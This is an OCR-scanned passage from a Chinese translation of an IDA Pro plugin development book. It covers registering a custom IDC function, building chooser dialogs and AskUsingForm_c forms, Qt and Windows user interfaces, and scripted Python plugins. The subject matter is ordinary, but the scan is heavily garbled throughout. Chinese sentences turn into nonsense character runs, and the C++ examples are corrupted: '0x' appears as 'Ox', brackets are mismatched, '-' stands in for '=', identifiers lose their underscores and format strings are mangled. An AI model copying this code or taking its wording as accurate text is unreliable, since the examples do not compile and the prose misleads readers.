const char *args, int extfunc flags); 








注意 , 为 了 简化 代码 , 这 里 引入 了 idc func 芋 数 据 类 型 。 这 个 数据 类 型 并 不 在 SDK 中 定义 。 
set idc func ex 的 参数 指定 我 们 正 创建 的 新 IDC 函数 的 名 称 ( ide name ) 一 个 指向 C++ 函数 ( 实 
施 我 们 新 建 的 IDC 函数 的 行为 ) 的 指针 (idc imp1 )， 还 有 一 个 以 零 结 束 的 字符 数组 ， 这 些 字符 
指定 新 IDC 函数 的 参数 类 型 和 列表 (args )。 

下 面 的 函数 可 用 作 插 件 的 初始 化 函数 。 它 通过 创建 我 们 正在 设计 的 新 IDC 函数 来 完成 扩展 











int idaapi init(void) { 
e» static const char idc str args[] = ( VT STR2, O }; 
e set idc func ex("CreateNetnode", idc create netnode, idc str args, 0); 
return PLUGIN KEEP; 


j 


yx] PR Gi] 859r IDC K% CreateNetnode ,并 将 它 与 我 们 的 实现 函数 idc_ create netnode( 9 ) 
关联 起 来 。 新 IDC 函数 的 参数 是 一 个 字符 串 类 型 的 参数 VT_STR2 ( @ )。 
真正 实现 CreateNetnode 的 行为 的 函数 如 下 所 示 : 


/* 
* native implementation of CreateNetnode. Returns the id of the new netnode 
* this id can be used with all of the existing IDC Array functions. 
vi 
static error t idaapi idc create netnode(idc value t *argv, idc value t *res) 
d 

€  res-»vtype = VT LONG; //xesult type is a netnode index 


(D 注意 现在 没有 办 法 通过 编程 在 已 编译 的 插件 中 扩展 IDAPython API。 
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@ if (argv[O0].vtype == VT STR2) { //verify we have the proper input type 
e netnode n(argv[0].c str(), 0, true); //create the netnode 
o res-»num - (nodeidx t)n; //set the result value 
l 
else { 
© res-»num = -1; //If the user supplies a bad argument we fail 


return eOk; 


j 


这 个 函数 的 两 个 参数 分 别 表 示 输 入 参数 数组 ( argv ), 其 中 包含 提交 给 CreateNetnode 的 所 有 
参数 (这 里 应 该 具有 一 个 )， 还 有 一 个 输出 参数 (res )， 它 用 于 接收 我 们 正在 执行 的 IDC KZT 
结果 。SDK 数据 类 型 idc value t 代表 一 个 IDC 值 , 这 个 数据 类 型 中 的 字段 指明 这 个 值 所 代表 的 
数据 的 当前 类 型 以 及 这 个 值 的 当前 内 容 。 这 个 函数 首先 指定 CreateNetnode 人 返回 一 个 长 (VT_LONG) 
f& ( 9). 由 于 IDC 变量 没有 类 型 ， 我 们 必须 指明 这 个 变量 在 任何 给 定 的 时 刻 所 保存 的 值 的 类 型 。 
接 下 来 ,该 函数 验证 CreateNetnode 的 调用 方 是 否 提供 了 一 个 字符 串 类 型 的 参数 VT STR C @ )。 如 
果 调 用 方 提供 了 一 个 有 效 的 参数 ， 则 使 用 提供 的 名 称 创 建 一 个 网 络 节点 ( @ )。 得 到 的 网 络 节点 
索引 号 将 以 CreateNetnode 函数 结果 的 形式 返回 给 调用 方 (@ ), 在 这 个 例子 中 , 结果 的 类 型 是 整 
数值 ， 因 此 ， 这 个 结果 将 存储 在 res->num 字段 中 。 如 果 结 果 类 型 是 一 个 字符 串 ， 那 么 ， 需 要 调 
用 res-»set string 来 设置 该 结果 的 字符 串 值 。 如 果 用 户 没有 提供 字符 串 参 数 ， 这 个 函数 将 无 法 
完成 任务 ， 并 返回 无 效 的 网 络 节 点 索引 -1 ( @ )。 

使 用 下 面 的 函数 和 PLUGIN 结构 体 完成 搬 件 的 创建 过 程 : 


void idaapi term(void) ()  //nothing to do on termination 
void idaapi run(int arg) (j //nothing to do and no way to activate 




















plugin t PLUGIN = { 
IDP INTERFACE VERSION, 
//this plugin loads at IDA startup, does not get listed on the Edit»Plugins menu 
//and modifies the database 
€ PLUGIN FIX | PLUGIN HIDE | PLUGIN MOD, // plugin flags 


init, // initialize 

term, // terminate. this pointer may be NULL. 
run, // invoke plugin 

Ee" // long comment about the plugin 

T // multiline help about the plugin 

"a // the preferred short name of the plugin 


// the preferred hotkey to run the plugin 
这 个 插件 的 特殊 之 处 在 于 ， 它 在 IDA Ja IET (C PLUGIN FDO, JP. H.— EDGE HI Best E HJ 
行踪 ， 因 为 它 并 没有 添加 到 Edit» Plugins 菜单 (PLUGIN HIDE, ©) 中 。 该 插件 一 直 驻 留 在 内 存 
中 ， 可 供 所 有 数据 库 使 用 。 它 的 所 有 初始 化 任务 都 在 init 因数 中 进行 ， 因 此 ， 插 件 的 run 方法 
基本 上 无 事 可 做 。 
安装 这 个 插件 后 ,IDC 程序 员 就 可 以 使 用 网 络 节点 名 称 访问 IDA 数据 库 中 的 任何 已 命名 网 络 
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节点 ， 如 下 面 的 例子 所 示 : 


auto n, val; 
n = CreateNetnode("$ imports"); //no $ idc array prefix will be added 
val = GetArrayElement(AR STR, n, 0); //get element zero 


AKEH SDK 5 IDC 交互 的 更 多 信息 ， 请 参阅 exprhpp 头 文件 。 
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本 书 并 非 用 户 界 面 开发 指南 ， 但 许多 时 候 ， 持 件 需 要 与 IDA 用 户 交 互 以 请 求 或 显示 信息 。 
除了 第 16 章 中 提 到 的 askXXX 函数 外 ,还 有 其 他 一 些 复杂 的 函数 可 以 通过 IDA API 实现 用 户 交 互 。 
对 于 更 加 大 胆 的 插件 作者 来 说 , 需要 记 住 的 是 ,为 GUI 版 的 IDA 开 发 的 插件 也 能 人 够 使 用 各 种 GUI 
JÆ (Qt 或 者 Windows Native ) 中 的 所 有 用 户 界面 涵 数 。 通 过 使 用 这 些 孔 数 , 你 几乎 可 以 使 用 插件 
中 的 任何 一 种 图 形 界 面 元 系 。 

除 SDK 的 askXXX 界面 函数 外 ， 使 用 SDK 构建 用 户 界 面 元 素 时 ， 你 将 面临 更 大 的 挑战 。 其 
中 一 个 原因 是 SDK 试图 通过 提供 一 个 非常 通用 的 编程 接口 来 完成 向 用 户 显 示 GUI 元 素 和 接受 用 
户 输入 之 类 的 复杂 任务 。 





























17.6.1 使 用 SDK 的 “选择 器 ”对 话 框 


我 们 首先 讨论 的 两 个 函数 是 choose 和 choose2. kernwin.hpp 文件 声明 了 这 些 函 数 以 及 用 于 控 
制 其 行为 的 各 种 和 常量。 这 两 个 国 数 的 作用 是 回 用 户 显 示 一 组 数据 元 素 , 并 要 求 用 户 从 中 选择 一 项 
或 几 项 。 通 过 要 求 你 指定 格式 化 函数 ， 从 而 生成 在 “选择 右 ” 窗 口中 显示 的 每 一 行文 本 ，choose 
函数 几乎 能 够 显示 任何 类 型 的 数据 。 这 两 个 函数 的 不 同 在 于 ，choose 显示 一 个 单列 列表 ， 而 
choose2 则 能 够 显示 一 个 多 列 列表 。 下 面 的 例子 提供 了 这 些 函数 的 最 简单 代码 ， 其 中 使 用 了 许多 
默认 参数 。 如 果 希 望 研究 choose 和 choose2 的 全 部 功能 ， 请 参阅 kernwin.hpp 文件 。 

为 向 用 户 显 示 一 列 信息 ， 最 简单 的 choose 函数 代码 如 下 所 示 ， 其 中 省 略 了 一 些 默认 人 参数: 




















ulong choose(void *obj, 
int width, 
ulong (idaapi *sizer)(void *obj), 
char *(idaapi *getline)(void *obj, ulong n, char *buf), 
const char *title); 


在 这 个 例子 中 ，obj 参数 是 一 个 指向 即将 显示 的 数据 块 的 指针 ，width ACE Areir BL] 
所 使 用 的 列 党 。sizer 参数 是 一 个 指 回 某 函数 的 指针 ,该 函数 能 够 解析 obj 所 指 的 数据 ,并 返回 显 
示 这 些 数 据 所 需 的 行 数 。get 1ine 参数 也 是 一 个 指向 某 耳 数 的 指针 , ARARE EN obj 选择 的 一 
个 项 的 字符 串 表 示 形 式 。 值 得 注意 的 是 ， 只 要 sizer 涵 数 能 够 解析 相关 数据 来 确定 显示 该 数据 所 
需 的 行 效 ， 且 getline 函数 能 够 使 用 一 个 整数 索引 定位 采 数 据 项 ， 并 生成 该 数据 项 的 字符 串 表 未 
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形式 ， 则 obj 指针 能 够 指向 任何 类 型 的 数据 。title 参数 指定 生成 的 “选择 器 ”对 话 框 使 用 的 标题 
CB. choose 限 数 返回 用 户 选 择 的 项 目的 索引 (1..n )， 如 果 用 户 取 消 该 对 话 框 ， 则 返回 0。 代 
码 清单 17-2 中 的 代码 摘 日 某 插 件 ， 里 然 并 不 十 分 令 人 兴奋 ， 但 它 说 明了 如 何 使 用 choose mär. 


代码 清单 17-2 choose 函数 的 示例 用 法 


#include «kernwin.hpp» 














//The sample data to be displayed 
int data[] = (Oxdeafbeef, Oxcafebabe, Oxfeedface, 0]; 


//this example expects obj to point to a zero 
//terminated array of non-zero integers. 
ulong idaapi idabook sizer(void *obj) { 

int *p = (int*)obj; 

int count = 0; 

while (*p++) counter; 

return count; 





* obj In this example obj is expected to point to an array of integers 

* n indicates which line (1..n) of the display is being formatted. 

* if n is zero, the header line is being requested. 

* buf is a pointer to the output buffer for the formatted data. IDA will 
ü call this with a buffer of size MAXSTR (1024). 


char * idaapi idabook getline(void *obj, ulong n, char *buf) { 
int *p = (int*)obj; 
if (n == 0) { //This is the header case 
qstrncpy(buf, "Value", strlen("Value") + 1); 


else ( //This is the data case 
qsnprintf(buf, 32, "Ox408.8x", p[n - 1]); 


return buf; 


} 


void idaapi run(int arg) ( 
int choice = choose(data, 16, idabook sizer, idabook getline, 
"Idabook Choose"); 
msg("The user's choice was %d\n", choice); 


激活 代码 清单 17-2 中 的 插件 将 生成 如 图 17-4 RA "EE de" Xp E. 
BER 





图 17-4 Ce de im TE Il 





choose2 子 数 可 以 显示 多 列 形式 的 “选择 器 ”对 话 框 。 同 样 ， 我 们 分 析 这 个 函数 的 最 简单 版 
本 ,接受 所 有 可 能 的 默认 参数 ， 如 下 所 示 : 


ulong choose2(void *obj, 
int ncol, 
const int *widths, 
ulong (idaapi *sizer)(void *obj), 
void (idaapi *getline)(void *obj, ulong n, char* const *cells), 
const char *title); 


可 以 看 到 ，choose2 函数 与 前 面 提 到 的 choose 函数 有 一 些 不 同 。 首 先 ，ncol 参数 指定 将 要 显 
示 的 列 数 ， 而 widths 参数 是 一 个 指定 每 列 宽度 的 整数 数组 。 在 choose2 P, getline 函数 的 格式 
发 生 了 一 些 变化 。 由 于 choose2 对 话 框 能 够 显示 多 列 ，getline 函数 必须 为 一 行 中 的 每 列 提 供 数 
据 。 代 码 清 单 17-3 中 的 示例 代码 说 明了 choose2 在 一 个 示例 插件 中 的 用 法 。 
代码 清单 17-3 choose? 函数 的 用 法 


#include <kernwin.hpp> 








//The sample data to be displayed 

int data[] = {Oxdeafbeef, Oxcafebabe, Oxfeedface, 0]; 
//The width of each column 

int widths[] = (16, 16, 16]; 

//The headers for each column 

char *headers[] = ("Decimal", "Hexadecimal", "Octal"]; 
//The format strings for each column 

char *formats[] = ("Xd", "Ox%x", "oXo"); 


//this function expects obj to point to a zero terminated array 
//of non-zero integers. 
ulong idaapi idabook sizer(void *obj) { 

int *p = (int*)obj; 

int count = 0; 

while (*p++) count++; 

return count; 


obj In this function obj is expected to point to an array of integers 
n indicates which line (1..n) of the display is being formatted. 
if n is zero, the header line is being requested. 
cells is a pointer to an array of character pointers. This array 
contains one pointer for each column in the chooser. The output 
S for each column should not exceed MAXSTR (1024) characters.*/ 
void idaapi idabook getline 2(void *obj, ulong n, char* const *cells) { 
int *p - (int*)obj; 
if foy) 
for (int i = 0; i < 3; i++) ( 
qstrncpy(cells[i], headers[i], widths[i]); 


* 关 X 关 * 
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else { 
for (int i = 0; i < 3; i++) { 
qsnprintf(cells[i], widths[i], formats[i], p[n - 1]); 


j 
j 


void run(int arg) { 
int choice - choose2(data, 3, widths, idabook sizer, idabook getline 2, 
"Idabook Choose2"); 
msg("The choice was %d\n", choice); 


使 用 代码 清单 17-3 rni B^ E RU ul "rEPERS S oU REUS 17-5 所 示 。 
GER 
i [Octal | 





图 17-5”choose2 对 话 框 示例 


还 可 以 通过 choose 和 choose2 了 兄 数 实现 更 加 复杂 的 用 法 ,每 个 函数 都 可 以 创建 模式 对 话 框 "和 
非 模 式 对 话 框 ， 每 个 消 数 都 能 够 生成 允许 选择 多 个 项 目的 对 话 框 。 而 且 ， 这 两 个 清 数 还 接受 其 他 
几 个 参数 ,你 能 得 知 在 对 话 框 中 发 生 的 各 种 事件 。 如 果 使 用 这 些 函 数 创建 非 模 式 对 话 框 ,你 将 得 
到 一 个 新 的 标签 式 窗口 ， 它 的 标签 将 添加 到 其 他 DA 显示 窗口 (如 Imports 窗口 ) 的 标签 旁边 。 
实际 上 ，IDA 的 Imports 窗口 使 用 choose2 界面 实现 。 有 关 choose 和 choose2 功能 的 更 多 信息 ， 
请 参阅 kernwin.hpp 文件 。 








17.6.2 ”使 用 SDK 创 建 自 定义 表单 


SDK 还 提供 了 AskUsingForm c 因数 ， 用 于 创建 更 加 复杂 的 用 户 界 面 元 素 。 这 个 晒 数 的 原型 
如 下 所 示 : 


int AskUsingForm c(const char *form,...); 





这 个 函数 看 似 非常 人 简单， 却 是 SDK rb Au E Zen DI ri Mi wë eg PUR EARSUEURT form 
参数 , 它 用 于 指定 自 定 义 对 话 框 中 各 种 用 户 界面 元 素 的 布局 。form 参数 本 质 上 是 一 个 描述 各 种 输 
入 元 素 布 局 的 格式 字符 串 ， 所 以 AskUsingForm c 与 printf 类 似 。printf 格式 字符 串 利用 被 格式 

















CD 你 必须 关闭 模式 对 话 框 ， 才 能 继续 与 该 对 话 框 的 父 应 用 程序 交互 。 "打开 文件 ”和 “保存 文件 ”对 话 框 就 是 典型 
的 模式 对 话 框 。 通 常 ， 在 继续 运行 之 前 ， 如 末 应 用 程序 需要 用 户 提 供 信息 ， 束 会 用 到 模式 对 话 框 。 为 一 方面 ， 非 
模式 或 无 模式 对 话 框 可 让 用 户 在 打开 对 话 框 的 同时 继续 与 父 应 用 程序 交互 。 
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化 数据 替代 的 输出 格式 符 ， 而 AskUsingForm c 格式 字符 串 则 由 输出 说 明 符 和 表单 字段 说 明 符 组 
成 ， 在 显示 表单 时 ， 后 者 由 输入 元 素 实 例 蔡 代 。 与 printf 相 比 ，AskuUsingForm_c 使 用 一 组 截然 
不 同 的 输出 字段 说 明 符 。kernwin.hpp 及 说 明 AskUsingForm c 用 法 的 所 有 文档 都 详细 介绍 了 这 些 
说 明 符 。 表 单字 段 说 明 符 的 基本 格式 如 下 所 示 : 


<#hint textilabel:type:width:swidth:Qhlp[]» 


下 面 介绍 表单 字段 说 明 符 中 的 每 一 个 组 件 。 

O #hint text#。 这 个 元 素 可 选 。 如 果 选 择 这 个 元 素 ， 当 把 光标 悬 停 在 相关 输入 字段 上 面 时 ， 
提示 文本 (不 包括 # 字 符 ) 将 以 工具 提示 的 形式 显示 。 

O 1abe1。 作 为 标签 在 相关 输入 字段 左 侧 显示 的 静态 文本 。 对 于 按钮 字段 ， 它 是 按钮 文本 。 

O type。 一 个 字符 ， 说 明 被 指定 的 表单 字段 的 类 型 。 后 面 将 介绍 表单 字段 类 型 。 

O width。 相 关 输 入 字段 接受 的 最 大 输入 字符 数 。 对 于 按钮 字段 ， 这 个 字段 指定 一 个 整数 按 
钮 识别 码 ， 用 于 区 分 不 同 的 按钮 。 

O swidth。 输 入 字段 的 显示 宽度 。 

O Ghlp[]s Æ kernwin.hpp 文件 中 ， 这 个 字段 被 描述 为 “IDA.HLP 文件 提供 的 帮助 窗口 的 数 
量 ”。 由 于 这 个 文件 的 内 容 由 Hex-Rays 指定 ， 因 此 ， 绝 大 部 分 情况 下 ， 这 个 字段 都 没有 
多 大 用 处 。 我 们 用 一 个 冒号 代替 这 个 字段 ， 表 示 忽 略 它 。 

在 运行 时 实现 对 话 框 时 将 生成 哪些 类 型 的 输入 字段 ， 取 决 于 type 字段 所 使 用 的 字符 。 每 种 

类 型 的 表单 字段 都 需要 AskUsingForm c 参数 列表 的 可 变 参 数 部 分 中 的 一 个 参数 。 表 单字 段 类 型 说 
明 符 及 其 相关 的 参数 类 型 如 下 所 示 CHE kernwin.hpp 文件 )。 























Input field types va list parameter 
A - ascii string char* at least MAXSTR size 
S - segment Sel t* 
N - hex number, C notation uval t* 
n - signed hex number, C notation sval t* 
L - default base (usually hex) number,  ulonglong* 
C notation 
1 - default base (usually hex) number, longlong* 
signed C notation 
M - hex number, no "Ox" prefix uval t* 
D - decimal number sval t* 
O - octal number, C notation sval t* 
Y - binary number, "Ob" prefix sval t* 
H - char value, C notation sval t* 
$ - address ea t* 
I - ident char* at least MAXNAMELEN size 
B - button formcb t button callback function 
K - color button bgcolor t* 
C - checkbox ushort* bit mask of checked boxes 
R - radiobutton ushort* number of selected radiobutton 
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所 有 数字 字段 将 用 户 提 交 的 输入 解释 成 一 个 IDC 表达 式 ， 当 用 户 单 击 对 话 框 的 OK 按钮 时 ， 
IDA 将 解析 这 个 表达 式 并 估算 它 的 值 。 所 有 字段 都 需要 一 个 用 于 输入 和 输出 的 指针 参数 。 第 一 次 
生成 表单 时 ， 所 有 表单 字段 的 初 值 通过 取消 相关 指针 的 引用 获得 。 返 回 后 , 用 户 提交 的 表单 字段 
值 被 写 入 到 相关 内 存 位 置 。 与 按钮 (B) 字段 关联 的 指针 参数 是 在 按 下 该 按钮 时 被 调用 的 困 数 的 
地 址 。formcb t 函数 的 定义 如 下 : 


// callback for buttons 
typedef void (idaapi *formcb t)(TView *fields[],int code); 


这 个 按钮 回调 函数 的 code 参数 表示 与 被 单 击 的 按钮 关联 的 代码 (宽度 ) 值 。 通 过 一 个 switch 
语句 测试 这 段 代 码 ， 你 可 以 使 用 一 个 函数 处 理 许多 不 同 的 按钮 。 

指定 单 选 按钮 和 复 选 框 的 语法 与 其 他 类 型 的 表单 字段 的 格式 略 有 不 同 。 这 些 字 段 使 用 的 格式 
如 下 所 示 : 



































<#item hintitlabel:type» 


要 对 单 选 按 钮 和 复 选 框 分 组 ， 可 以 按 顺 序列 出 它们 的 说 明 符 ,并 使 用 下 面 的 特殊 格式 ( 注意 
末尾 的 为 一 个 > ) 表示 列表 的 结尾 部 分 。 





<#item hintitlabel:type»» 


你 可 以 将 一 个 单 选 按钮 《或 复 选 框 ) 组 用 框框 住 , 以 突出 显示 。 在 指定 组 中 的 第 一 个 元 系 时 ， 
你 可 以 通过 一 个 特殊 的 格式 为 框 提供 标题 ， 如 下 所 示 : 





<#item hint#title#box hintitlabel:type» 
如 有 果 想 要 一 个 框 标题 ,但 不 需要 任何 提示 ， 可 以 省 略 提 示 ， 最 终 的 格式 说 明 符 如 下 所 示 : 


<##title##label:type> 











现在 看 一 下 使 用 AskUsingForm c 创建 对 话 框 的 一 个 xi 
例子 ,我 们 在 这 整个 例子 中 使 用 的 对 话 框 如 图 17-6 所 示 。 we Fc - 
用 于 创建 AskUsingForm c 对 话 框 的 格式 字符 串 由 许 peanal [o 
多 代码 行 组 成 ， 它 们 指定 该 对 话 框 的 每 一 个 元 素 。 除 了 DEI 
表单 字段 说 明 符 以 外 ， 格 式 字符 串 可 能 还 包含 在 生成 的 € 
对 话 框 中 逐 字 显示 的 静态 文本 。 此 外 ， 格 式 字符 捉 还 包 Sieg 
含 一 个 对 话 框 标题 (后 面 必 须 带 两 个 换行 符 )、 一 个 或 几 Chede Bones 
个 行为 指令 (如 STARTITEM， 它 指定 对 话 框 第 一 次 显示 时 Ke? 





最 初 处 于 活动 状态 的 表单 字段 的 索引 )。 用 于 创建 图 17-6 
所 示 对 话 框 的 格式 字符 串 如 下 所 示 : 图 17-6  AskUsingForm c 示例 对 话 框 
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char *dialog = 
"STARTITEM On" //The first item gets the input focus 
"This is the Glenn" //followed by 2 new lines 
"This is static text n" 
"«String:A:32:32::»MAn" — //An ASCII input field, need char[MAXSTR] 
"«Decimal:D:10:10::»An" //A decimal input field, sval t* 
"<#No leading OxitHex:M:8:10::»Mn"  //A Hex input field with hint, uval t* 


"<Button:B::::>\n" //A button field with no code, formcb t 
"<##Radio Buttons##Radio 1:R>\n" — //A radio button with box title 
"«Radio 2:R»»Mn" //Last radio button in group 

//ushort* number of selected radio 
"<##Check Boxes##Check 1:C>\n" //A checkbox field with a box title 
"«Check 2:C>>\n"; //Last checkbox in group 


//ushort* bitmask of checks 











MEARE, RETT— UU. RIDUPERETTEBECLUTN A C HERD 17-6 中 对 应 的 
字段 轻松 地 对 应 起 来 。 你 可 能 注意 到 ， 在 图 17-6 中 ， 所 有 文本 和 数字 输入 字段 均 以 下 拉 列 表 的 
形式 出 现 。 为 了 帮助 你 市 省 时 间 ，IDA 用 最 近 输 入 的 值 ( 其 类 型 与 相关 输入 字段 的 类 型 相 匹 配 ) 
填写 了 每 个 列表 。 下 面 的 插件 代码 可 用 于 显示 上 面 的 示例 对 话 框 并 处 理 任何 结 








void idaapi button func(TView *fields[], int code) { 
msg("The button was pressed! Nn"); 


void idaapi run(int arg) { 
char input[MAXSTR ] ; 
sval t dec = 0j 
uval t hex - Oxdeadbeef; 
ushort radio - 1; //select button 1 initially 
ushort checkmask = 3; //select both checkboxes initially 
qstrncpy(input, "initial value", sizeof(input)); 
if (AskUsingForm c(dialog, input, 8dec, &hex, 
button func, &radio, &checkmask) == 1) { 
msg("The input string was: %s\n", input); 
msg("Decimal: Ad, Hex %x\n", dec, hex); 
msg("Radio button Xd is selectedWn", radio); 
for (int n = 0; checkmask; n++) { 
if (checkmask & 1) { 
msg("Checkbox Xd is checkedWn", n); 


checkmask >>= 1; 


j 
j 
j 


注意 ， 在 处 理 单 选 按钮 和 复 选 框 结 采 时 ， 每 组 中 的 第 一 个 按钮 被 视 为 “按钮 0”。 
AskUsingForm c 函数 有 相当 强大 的 功能 ， 可 用 于 为 你 的 插件 设计 用 户 界 面 元 素 。 这 里 的 例子 
只 是 粗略 介绍 了 这 个 函数 的 许多 功能 ，kernwin.hpp 文件 详细 介绍 了 更 多 其 他 功能 。 请 参阅 这 个 
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文件 ， 了 解 有 关 AskUsingForm c 函数 及 其 功能 的 详细 信息 。 


17.6.3 ” 仅 用 于 Windows 的 用 户 界 面 生成 技巧 


许多 开发 者 一 直 在 全 力 应 付 为 插件 创建 用 户 界 面 的 难题 。 针 对 IDA 的 Windows GUI 版 本 
( idag.exe ) 的 插件 可 以 使 用 所 有 Windows 图 形 API» Tenable Security 的 mIDA-” 搬 件 的 作者 设计 
了 另 一 种 方法 , 可 用 于 创建 mIDA 插件 使 用 的 MD 客户 窗口 。 为 解决 mIDA 开发 者 面临 的 挑战 ， 
IDA 支持 论坛 提供 了 一 个 超 长 的 线程 ”。 该 线程 还 包含 示例 代码 ， 说 明 他 们 的 解决 方案 。 

ida-x86emu 插件 使 用 的 用 户 界面 与 其 他 插件 稍 有 不 同 。 这 个 插件 使 用 下 面 的 SDK 代码 获得 
IDA 主 窗口 的 一 个 句柄 : 

















HWND mainWindow = (HWND)callui(ui get hwnd).vptr; 


ida-x86emu 现在 并 没有 整合 到 IDA 工作 区 中 ， 只 是 使 用 IDA 主 窗口 作为 父 窗 口 。 这 个 插件 
的 所 有 对 话 框 界面 全 都 使 用 Windows 资源 编辑 右 生 成 ， 所 有 用 户 交 互 则 通过 直接 调用 Windows 
API 孙 数 来 处 理 。 使 用 图 形 对 话 框 编辑 器 并 直接 调用 本 地 Windows API 函数 ， 可 以 实现 最 强大 的 
用 户 界 面 生 成 功能 , 但 这 种 方法 非常 复杂 ,而 且 需 要 使 用 者 了 解 其 他 一 些 知 识 ， 如 处 理 Windows 
消息 以 及 使 用 低级 的 界面 也 数 。 


17.6.4 使 用 Qt 生成 用 户 界 面 


IDA 6.0 中 引入 的 Qt 用 户 界面 为 插件 开发 者 创建 具有 复杂 用 户 界 面 、 可 用 于 所 有 IDA 平台 的 
插件 提供 了 机 会 。Hex-Rays 的 Daniel Pistelli* 在 Hex-Rays 博客 上 的 一 篇 文章 中 讨论 了 在 插件 中 使 
用 Qt 的 一 些 要 求 。 "在 这 一 节 中 , 我 们 将 重申 Daniel 提出 的 一 些 要 点 ,并 提供 其 他 一 些 有 用 信息 。 

如 果 你 希望 在 插件 中 利用 Qt 的 任何 功能 ， 首 先 你 必须 正确 配置 Qt 开发 环境 。IDA 6.1 附 市 
有 自己 的 Qt4.7.2 FE^, Hex-Rays 建立 自己 的 Qt 库 时 ， 它 将 该 库 包 装 在 一 个 名 为 QT 的 C++ 命名 
空间 中 。 要 配置 你 的 开发 环境 ， 请 从 Nokia 获取 适当 的 Qt 源 代 码 。Windows 版 本 的 idaq 使 用 
Visual Studio 2008 创建 *，Linux 和 OS X 版 本 的 则 使 用 g++ 创建 。 请 从 以 下 地 址 下 载 Windows 
版 本 的 源 代 码 : 












































ftp://ftp.qt.nokia.com/qt/source/qt-win-opensource-4.7.2-vs2008.exe 


(D 参见 http://cgi.tenablesecurity.com/tenable/mida.php. 

(22 Windows 多 文档 界面 (MDI) 允许 在 一 个 容 需 窒 口中 包含 多 个 子 (客户 ) 窗口 。 

@ 参见 http://www.hex-rays.com/forum/viewtopic.php?f=8&t=1660&p=6752.- 

由 参见 http://www.idabook.com/ida-x86emu., 

(5) Daniel 负责 Hex-Rays 将 IDA 的 GUI 迁移 到 Qt 的 工作 。 

© 参见 http:/www.hexblog.com/?p=250。 

CD IDA 6.0 使 用 Qt 4.6.3。 

此 ， 如 果 要 在 Windows 上 创建 Qt 相关 的 插件 ， 你 必须 使 用 Visual Studio 来 创建 你 的 插件 。 
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请 从 以 下 地 址 下 载 Linux 和 OS X 版 本 的 源 代码: 


ftp://ftp.qt.nokia.com/qt/source/qt-everywhere-opensource-src-4.7.2.tar.gz 


请 参阅 Daniel 的 博客 文 草 了 解 用 于 配置 源 代码 的 特定 命令 ,正确 配置 的 关键 在 于 使 用 以 下 命 


-qtnamespace QT 


此 参数 将 Qt 源 代码 包装 在 QT 命名 空间 中 。 要 在 Windows 上 创建 任何 Qt 相关 插件 ， 你 需要 
将 在 插件 中 用 到 的 每 个 Qt 库 的 链接 库 ( .lib X fF). 虽然 IDA Mi T KRKE Qt 动态 链接 库 ( 参见 
<IDADIR> 目 录 了 解 完 整 列 表 ), 但 SDK 附带 的 用 于 Windows 的 Qt 链接 库 的 数量 非常 有 限 (E 
要 包括 QtCore4 和 QtGui )， 这 些 库 可 以 在 <SDKDIR>/lib/x86 win dt 目录 中 找到 。 如 果 你 需要 其 
他 链接 库 , 你 需要 链接 到 你 自己 从 Qt 源 代 码 创 建 的 库 ,在 Linux 和 OSX 上 ,你 可 以 直接 链接 IDA 
附带 的 Qt Æo Æ Linux 上 ， 这 些 库 位 于 <IDADIR> 目 录 中 ， 而 在 OS X 上 上， 它们 位 于 
<IDADIR>/idaq.app/Contents/Frameworks 目录 中 。 请 注意 ， 链 接 并 非 由 IDA 附带 的 Qt 库 会 降低 
插件 的 兼容 性 ， 除 非 你 与 插件 一 起 发 布 这 些 库 。 

配置 Qt 插件 项 目 时 ， 请 确保 gmake 项 目 文件 包含 以 下 项 目 配置 指令 : 




















OT NAMESPACE = OT 


IDA 定义 了 许多 因数 ， 以 便于 在 SDK 中 更 安全 地 处 理 字 符 串 。 这 些 函 数 包 括 qstrlen 和 
qsnprintf， 很 长 时 间 以 来 ， 它 们 一 直 是 SDK 的 一 部 分 。 和 了 迁移 到 基于 Qt 的 GUI 后 ， 使 用 这 些 函 
数 可 能 会 导致 问题 ， 因 为 Qt 还 定义 了 几 个 与 IJDA 所 提供 的 函数 名 称 相 同 的 函数 。IDA 函数 位 于 
全 局 命名 空间 中 ， 而 Qt 图 数 则 位 于 QT 命名 空间 中 。 通 过 明确 引用 全 局 命名 空间 ， 可 以 调用 这 些 
äm IDA 版 本 ， 如 下 所 示 : 








unsigned int len = ::qstrlen(myString); 


如 采 你 需要 为 你 在 插件 中 创建 的 任何 部 件 提供 一 个 父 部 件 ( parent widget), 使 用 下 面 的 语句 
将 获得 一 个 指向 idaq 的 顶级 应 用 程序 窗口 的 指针 : 








QWidget *mainWindow = QApplication::activeWindow(); 


这 个 语句 调用 Qt QApplication 类 中 的 一 个 静态 方法 ， 并 返回 任何 Qt 应 用 程序 中 唯一 的 
QApplication 对 象 的 部 件 指 针 。 

有 关 如 何 配 置 插件 以 使 用 Qt 的 详细 信息 ， 请 参阅 Daniel 的 博客 文章 。 此 外 ，IDASDK 附带 
的 qwindow 插件 样本 也 提供 了 一 个 使 用 Qt 的 插件 示例 。 具 体 而 言 ， 其 中 包含 示例 代码 ， 它 用 于 
创建 一 个 空 部 件 (使 用 create tform )， 使 用 回调 以 接收 正 显示 表单 的 通知 ， 获 得 指向 新 建 表单 
的 QWidget 指针 , 以 及 最 终 使 用 一 个 Qt 按钮 对 象 填写 该 表单 。 将 在 第 23 草 中 讨论 的 collabREate 
和 ida-x86emu 插件 也 利用 了 Qt GUI 元 素 ， 以 将 这 些 插件 用 在 所 有 IDA 平 台中 。 
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17.7 脚本 化 插件 


IDA 5.6 引 入 了 对 脚本 化 加 载 器 模块 的 支持 。IDA5.7 则 添加 了 对 脚本 化 择 件 ( scripted plug-in ) ^ 
和 处 理 怖 模块 的 支持 。 虽然 这 样 做 不 一 定 有 助 于 开发 出 更 加 强大 的 插件 , 但 它 确实 在 一 定 程度 上 
降低 了 插件 开发 者 开发 搬 件 的 难度 ， 并 且 由 于 取消 了 复杂 的 构建 流程 ， 也 缩短 了 开发 周期 。 

尽管 你 可 以 使 用 IDC 或 Python 创建 脚本 化 插件 , 但 由 于 Python 与 IDA SDK 非常 类 似 , 使 用 
Python 可 能 是 你 的 最 佳 选 择 。 鉴 于 此 ，Python 插件 就 与 已 编译 的 C++ 搬 件 一 样 强 大 了 。 

创建 Python 插件 的 过 程 非 常 简单 。 你 主要 需要 定义 一 个 名 为 PLUGIN ENTRY 的 吨 数 ， 该 吨 数 
返回 plugin t (在 模块 idaapi 中 定义 ) 的 一 个 实例 。plugin t 类 包含 反映 SDK 的 C++ plugin t 
类 成 员 的 成 员 。 代 码 清 单 17-4 显示 了 一 个 简单 的 Python 插件 ,该 插件 定义 了 一 个 名 为 
